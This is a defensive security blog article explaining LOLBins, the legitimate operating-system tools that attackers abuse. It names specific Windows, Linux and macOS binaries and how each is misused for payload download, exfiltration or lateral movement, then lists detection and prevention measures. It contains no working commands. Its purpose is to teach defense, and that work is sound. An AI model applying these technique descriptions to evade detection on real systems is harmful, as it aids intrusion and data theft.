Contact
Under Attack?
Contact
Volver
R & D + i Team
Compartir:
DefensiveTechnical
Note 131
3
minutos

LOLBins: Hidden weapons in your own operating system

“LOLBins” (Living off the Land Binaries) is a technique that consists of taking advantage of legitimate tools and processes of the operating system itself to carry out malicious activities undetected. This approach, known as “Living off the Land”, allows attackers to camouflage their actions among normal system operations, making them difficult to identify.

For organizations, understanding and recognizing the use of LOLBins is essential to strengthen their defense strategies. By using native system tools, cybercriminals can avoid detection by conventional security solutions, posing a significant threat to the integrity and security of corporate information.

The purpose of this article is to go deeper into the concept of LOLBins, to analyze how they work and to highlight the importance of being alert to this constantly evolving technique.

Definition
LOLBins, an acronym for “Living Off the Land Binaries,” are legitimate, pre-installed executables in operating systems that cybercriminals exploit to carry out malicious activities without raising suspicion. By using these embedded tools, attackers can camouflage their actions as routine system operations, making them difficult to detect.

Difference between LOLBins, LOLScripts and LOLLibs
In addition to LOLBins, there are other related terms:

  • LOLScripts: Legitimate system scripts that can be exploited for malicious purposes.
  • LOLLibs: System libraries that, similarly, can be misused by attackers.

Although they all share the characteristic of being legitimate system components used for malicious purposes, they differ in nature: executables (LOLBins), scripts (LOLScripts) and libraries (LOLLibs).

Origin of the concept and historical cases
The concept of “Living Off the Land” was introduced by researchers Christopher Campbell and Matt Graeber in 2013 to describe how attackers employ trusted, pre-installed tools on systems for their malicious purposes.

One notable example is the TA505 group, which in 2018 conducted phishing campaigns targeting large financial organizations. They used LOLBins to covertly distribute malware, demonstrating the effectiveness of this technique in evading traditional security defenses.

Most used LOLBins
Cybercriminals take advantage of legitimate tools present in operating systems to carry out malicious activities without being easily detected. Below are some of the most commonly used LOLBins on different platforms:

Windows:

  • powershell.exe: PowerShell is a powerful command line and scripting tool in Windows. Attackers use it to execute malicious scripts, download payloads from the Internet and perform lateral movements within the network, all without leaving obvious traces on the file system.
  • rundll32.exe: This utility loads and executes dynamic link libraries (DLLs). It is used by cybercriminals to execute malicious code contained in DLLs, allowing malware to run without creating visible executable files.
  • bitsadmin.exe: Originally designed to manage background transfers, such as updates, this program can be manipulated to download or upload malicious files from or to attacker-controlled servers, facilitating data exfiltration or the introduction of malware.
  • mshta.exe: Executes HTML applications. Attackers use it to execute malicious scripts embedded in HTML files or directly from the Internet, allowing code execution without alerting security solutions.
  • certutil.exe: Command-line tool for certificate management in Windows. It is abused by cybercriminals to download and decode malicious files, taking advantage of its ability to handle data in encrypted formats.

Linux:

  • bash: The default command interpreter in many Linux distributions. Attackers can write and execute malicious scripts directly in bash to automate malicious tasks such as data mining or creating backdoors.
  • wget and curl: Utilities for transferring data to or from servers. Cybercriminals use them to download malicious scripts or binaries from remote locations, facilitating the introduction of malware into the system.
  • ssh: Protocol for securely accessing remote systems. If credentials are compromised, attackers can use ssh to move laterally between systems within a network, maintaining undetected access.

macOS:

  • osascript: Enables the execution of AppleScript scripts and other languages. Attackers use it to execute malicious scripts that can interact with applications and the operating system, facilitating actions such as capturing sensitive information or executing arbitrary commands.
  • bash: As in Linux, bash is present in macOS and can be used to execute malicious scripts, providing attackers with a way to perform unauthorized actions on the system.

Detection and prevention methods

  • Implementation of EDR and XDR solutions: Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) solutions are essential for monitoring and analyzing suspicious activity on systems. These tools can identify anomalous behavior associated with the misuse of LOLBins. For example, they can detect the unusual execution of binaries such as rundll32.exe or regsvr32.exe which, although legitimate, can be exploited for malicious purposes.
  • Monitoring the use of system tools: It is crucial to continuously monitor the use of tools and binaries built into the operating system. Establishing baselines of normal behavior for these binaries helps to identify deviations that could indicate malicious activity. For example, if mshta.exe initiates unusual network connections or downloads scripts from unauthorized locations, this could be an indication of compromise.
  • Enforce the principle of least privilege: Limiting the privileges of collaborators and applications significantly reduces the opportunities for cybercriminals to exploit LOLBins. Ensure that users and processes only have the permissions necessary to perform their functions, minimizing the risk of unauthorized execution of system binaries.
  • Log review and monitoring for unusual behavior: Configuring detailed, centralized logs allows for effective review of system activities. Detecting unusual patterns, such as running binaries from non-standard locations or with atypical parameters, can signal misuse of LOLBins. For example, running certutil.exe to download files from the Internet is a known technique used by attackers.
  • Blocking unneeded tools in organizational environments: Identifying and disabling binaries and scripts that are not essential to the organization’s operations can prevent their malicious use. Implementing lists of allowed applications and restricting the execution of tools such as powershell.exe or wmic.exe to authorized users and processes strengthens the security posture.

Good protection practices

  • Software updates and security patches: Keeping all systems and applications up to date is critical. Cybercriminals often exploit vulnerabilities in outdated software to execute LOLBins-based attacks. Establish a regular process for patch management and ensure that all updates are applied in a timely manner.
  • Employee education and training: Staff awareness is a crucial line of defense. Provide ongoing training for employees to recognize social engineering and phishing tactics, common methods for initiating attacks using LOLBins. Phishing simulations and cybersecurity awareness programs can be effective tools in this regard.
  • Implement the principle of least privilege: Limit user and process permissions to the minimum level necessary to perform their functions. By restricting privileges, you reduce the ability of attackers to exploit LOLBins and execute malicious commands with high levels of access.
  • System behavior monitoring and analysis: Use monitoring tools to detect anomalous system behavior that may indicate misuse of LOLBins. Continuous monitoring allows you to quickly identify and respond to suspicious activity before it causes significant damage.
  • Vulnerability management: Conduct regular vulnerability assessments to identify and remediate potential weaknesses in the IT infrastructure. Proactive vulnerability management helps prevent attackers from exploiting LOLBins through known system flaws.
  • Regular and secure backups: Establish procedures for regular backups of critical data and store them in secure locations isolated from the main network. This ensures the integrity and availability of information in case an attack compromises the main systems.

Conclusion
Cybercriminals have perfected the art of using legitimate operating system tools, known as LOLBins, to carry out malicious activities undetected. This strategy allows them to evade traditional security solutions and maintain prolonged access to compromised systems. For organizations, it is essential to recognize this threat and take proactive measures that include continuous monitoring of suspicious activity, implementation of least privilege policies and ongoing training of their employees in cybersecurity practices. By understanding and anticipating LOLBins-based tactics, organizations can strengthen their security posture and significantly reduce the risk of compromise.

Notas
recientes
General
5
minutos

Threat Hunting with behavior prediction

We are constantly searching for elements that help us to predict how we will be attacked and thus do something proactively to reduce these risks. Cyber Threat Intelligence (CTI) is the discipline that collects,...
ver más ...

We work in an interconnected
manner from Latin
America, the USA and Europe.

Contact us

Certifications

Achievements

Policies

RRSS

iconos pie -13-svg
iconos pie -14-svg
iconos pie -12-svg

© BASE4 Security S.A. All rights reserved 2025